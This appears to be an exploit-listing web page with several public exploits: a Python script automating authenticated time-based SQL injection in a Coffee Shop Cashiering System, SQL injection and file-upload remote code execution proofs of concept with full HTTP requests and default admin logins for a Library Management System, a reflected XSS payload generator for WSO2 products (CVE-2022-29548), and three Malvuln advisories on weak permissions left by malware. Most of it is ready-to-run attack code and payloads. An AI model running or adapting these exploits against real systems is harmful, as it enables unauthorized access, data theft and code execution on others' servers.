Latest exploits :: CodePwn

<pre><code># Exploit Title: Coffee Shop Cashiering System - Authenticated Time Based Sql injection # Date: 27-06-2022 # Exploit Author: syad # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cscs.zip # Version: 1.0 # Tested on: Windows 10 + XAMPP 3.2.4 # CVE ID : N/A # Description # The id parameter does not perform input validation on the view_detail.php file it allow authenticated Time Based SQL Injection. import requests import sys s = requests.session() proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"} def login_sql(): target = "http://%s/cscs/classes/Login.php?f=login" % sys.argv[1] d = { "username" : "admin", "password" : "admin123" } r = s.post(target, data=d, allow_redirects=True, proxies=proxies) res = r.text if "success" in res: return True else: return False def detect_sql(): r = s.get("http://%s/cscs/admin/?page=sales/view_details&id=2'" % sys.argv[1]) res = r.text if "You have an error in your SQL syntax;" in res: print("[+] SQL Error Found !!") else: return False def time_based_sql(): target = "http://%s/cscs/admin/?page=sales/view_details&id=2'+or+sleep(5)--+-" % sys.argv[1] r = s.get(target, proxies=proxies) print("[+] Time Based SQL Injection Executed !!!") def main(): if len(sys.argv) !=2: print("(+) usage: %s <target>" % sys.argv[0] ) print("(+) eg: %s 192.168.121.103 " % sys.argv[0] ) sys.exit(-1) if login_sql(): print("[+] Success Login") detect_sql() time_based_sql() if __name__ == "__main__": main() </code></pre>

<pre><code>#### Title: Library Management System with QR code Attendance 1.0 SQL Injection #### Author: Ashish Kumar ( https://www.linkedin.com/in/ashish-kumar-0b65a3184) #### Date: 27.06.2022 #### Vendor: https://www.sourcecodester.com/users/kingbhob02 #### Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html #### Version: 1.0 #### Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md #### Description： ##### The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Library Management System with QR code Attendance does not filter the content correctly at the "bookdetails.php" id parameter, resulting in the generation of SQL injection. #### Payload used: `' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB` #### POC 1. Login into the CMS. Admin Default Access: Username: admin Password: admin 2. http://localhost/LMS/librarian/bookdetails.php?id=191 3. Put sleep(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`) 4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB` 5. code ``` GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1 Host: localhost sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco Connection: close ``` </code></pre>

<pre><code>#### Title: Library Management System with QR code Attendance_File Upload RCE #### Author: Ashish Kumar ( https://www.linkedin.com/in/ashish-kumar-0b65a3184) #### Date: 27.06.2022 #### Vendor: https://www.sourcecodester.com/users/kingbhob02 #### Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html #### Version: 1.0 #### Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md #### Description： #### At the file upload function, the application system checks the validity of the file type, format, and content uploaded by the user, so that attackers can upload Webshell (.php, .jsp, asp, etc.) malicious script files or files in unexpected formats, such as: HTML files, SHTML files, etc., at the same time, you can use characters such as directory jump or control the upload directory to directly upload files to the Web directory or any directory, which may lead to the execution of arbitrary malicious script files on the remote server, thereby directly obtaining application system permissions. #### $uploaddir = 'assets/uploads/'; #### $uploadfile = $uploaddir . basename($_FILES['image']['name']); #### Payload used: `<?php phpinfo();?>` ### POC ``` POST /LMS/card/index.php HTTP/1.1 Host: localhost Content-Length: 1056 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryngJP5BxPA6UsA91O User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/LMS/card/index.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco Connection: close ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="name" File_Upload ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="grade" Computer Studies ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="dob" Student ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="address" Testing Testing ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="email" ashish@cyberthoth.in ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="exp_date" 1990-02-11 ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="id_no" 8529637 ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="phone" 1212121212 ------WebKitFormBoundaryngJP5BxPA6UsA91O Content-Disposition: form-data; name="image"; filename="File_upload.php" Content-Type: application/octet-stream <?php phpinfo();?> ------WebKitFormBoundaryngJP5BxPA6UsA91O-- ``` #### Access below URL: `http://localhost/LMS/card/assets/uploads/File_upload.php` ![image]( https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png ) </code></pre>

<pre><code># Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS) # Date: 21 Apr 2022 # Exploit Author: cxosmo # Vendor Homepage: https://wso2.com # Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0; # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; # API Microgateway 2.2.0; # Data Analytics Server 3.2.0; # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; # Identity Server Analytics 5.5.0 and 5.6.0; # WSO2 Micro Integrator 1.0.0. # Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82) # CVE: CVE-2022-29548 import argparse import logging import urllib.parse # Global variables VULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode=" DEFAULT_PAYLOAD = "alert(document.domain)" # Logging config logging.basicConfig(level=logging.INFO, format="") log = logging.getLogger() def generate_payload(url, custom_payload=False): log.info(f"Generating payload for {url}...") if custom_payload: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//") else: log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//") def clean_url_input(url): if url.count("/") > 2: return f"{url.split('/')[0]}//{url.split('/')[2]}" else: return url def check_payload(payload): encoded_characters = ['"', '<', '>'] if any(character in payload for character in encoded_characters): log.info(f"Unsupported character(s) (\", <, >) found in payload.") return False else: return urllib.parse.quote(payload) if __name__ == "__main__": # Parse command line parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter) required_arguments = parser.add_argument_group('required arguments') required_arguments.add_argument("-t", "--target", help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)", required="True", action="store") parser.add_argument("-p", "--payload", help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))", action="store", default=False) args = parser.parse_args() # Clean user target input args.target = clean_url_input(args.target.lower()) # Check for unsupported characters in custom payload; URL-encode as required if args.payload: args.payload = check_payload(args.payload) if args.payload: generate_payload(args.target, args.payload) else: generate_payload(args.target) </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/1fd70e41918c3a75c634b1c234ec36fb.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.InfecDoor.17.c Vulnerability: Insecure Permissions Description: The malware writes a ".420" settings file type to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the file dropped by the malware to disable, change its settings or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: InfecDoor Type: PE32 MD5: 1fd70e41918c3a75c634b1c234ec36fb Vuln ID: MVID-2022-0614 Disclosure: 06/23/2022 Exploit/PoC: C:\>cacls Infector.420 C:\Infector.420 BUILTIN\Administrators:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Users:(ID)R NT AUTHORITY\Authenticated Users:(ID)C C:\>dir Infector.420 Volume in drive C has no label. Directory of C:\ 04/11/2022 03:29 AM 36 Infector.420 1 File(s) 36 bytes 0 Dir(s) 24,644,292,608 bytes free C:\>type Infector.420 [My_OVER_ALL_SETTINGS] FirsTime=0 Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/20e438d84aa2828826d52540d80bf7f.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Trojan-Mailfinder.Win32.VB.p Vulnerability: Insecure Permissions Description: The malware writes a dir with multiple PE files to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: VB Type: PE32 MD5: 20e438d84aa2828826d52540d80bf7fa Vuln ID: MVID-2022-0616 Disclosure: 06/23/2022 Exploit/PoC: C:\>cacls IMB C:\IMB BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C C:\>dir IMB Volume in drive C has no label. Directory of C:\IMB 09/12/2003 09:07 PM 140,288 comdlg32.ocx 06/16/2004 01:17 PM 282,624 IMB.exe 09/12/2003 09:07 PM 1,388,544 msvbvm60.dll 09/12/2003 09:07 PM 108,336 MSWINSCK.OCX 09/15/2003 05:16 PM 192 Readme.txt 10/04/2001 12:16 AM 147,483 scrrun.dll 10/04/2001 12:16 AM 17,920 stdole2.tlb 09/12/2003 09:07 PM 2,864 winsock.dll 8 File(s) 2,088,251 bytes Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022 Original source: https://malvuln.com/advisory/5a83f8b8c8a8b7a85b3ff632aa60e793.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Shark.btu Vulnerability: Insecure Permissions Description: The malware writes multiple PE files to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the executable dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges. Family: Shark Type: PE32 MD5: 5a83f8b8c8a8b7a85b3ff632aa60e793 Vuln ID: MVID-2022-0615 Disclosure: 06/23/2022 Exploit/PoC: C:\Fraps BUILTIN\Administrators:(OI)(CI)(ID)F NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F BUILTIN\Users:(OI)(CI)(ID)R NT AUTHORITY\Authenticated Users:(ID)C NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C C:\>dir Fraps Volume in drive C has no label. Directory of C:\Fraps 01/14/2008 08:12 AM 12,988 changes.txt 01/14/2008 08:51 AM 172,032 fraps.dll 01/14/2008 08:53 AM 913,064 fraps.exe 01/14/2008 08:51 AM 1,683,968 fraps64.dat 01/14/2008 08:51 AM 111,616 fraps64.dll 01/14/2008 08:51 AM 135,168 frapslcd.dll 05/12/2022 02:02 AM DIR HELP 01/14/2008 08:07 AM 1,841 README.HTM 05/12/2022 02:02 AM 34,552 uninstall.exe 8 File(s) 3,065,229 bytes Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>